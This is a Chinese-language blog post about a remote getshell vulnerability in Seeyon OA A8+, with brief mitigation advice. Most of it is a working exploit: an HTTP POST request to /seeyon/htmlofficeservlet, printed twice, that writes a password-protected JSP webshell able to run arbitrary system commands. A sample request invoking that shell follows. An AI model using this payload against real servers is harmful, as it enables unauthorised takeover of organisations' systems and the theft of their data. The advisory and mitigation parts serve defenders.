致远 OA A8 Getshell-Legend‘s BLog

严重程度：高危

CVE编号：暂无

影响版本：A8+V7.0 SP3、A8+V6.1 SP2

致远A8+协同管理软件，存在远程Getshell漏洞，攻击者通过漏洞可获取网站管理权限。

修复方案：

1.临时缓解措施配置URL访问控制策略

部署于公网的致远A8+服务器，可通过防火墙配置规则禁止外网对“/seeyon/htmlofficeservle t”路径的访问。

2. 请尽快联系厂商，索要官方补丁程序。

厂商官网：http://www.seeyon.com/info/company.html

POC详情

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1111
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ip:port
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("123".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

POST /seeyon/htmlofficeservlet HTTP/1.1

Content-Length: 1111

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: ip:port

Pragma: no-cache

DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV

OPTION=S3WYOSWLBSGr

currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

CREATEDATE=wUghPB3szB3Xwg66

RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

originalFileId=wV66

originalCreateDate=wUghPB3szB3Xwg66

FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

needReadFile=yRWZdAS6

originalCreateDate=wLSGP4oEzLKAz4=iz=66

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("123".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

访问webshell

http:ip:port/seeyon/test123456.jsp?pwd=123&cmd=cmd+/c+whoami
test123456.jsp名称由来为FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6解密以后，加密方式不详，可能为oa内置加密方式

转载请注明： 转载自Legend‘s BLog

本文链接地址: 致远 OA A8 Getshell

未经允许不得转载：Legend‘s BLog » 致远 OA A8 Getshell

致远 OA A8 Getshell

访问webshell

相关推荐

发表评论取消回复

访问webshell

相关推荐

发表评论 取消回复

发表评论取消回复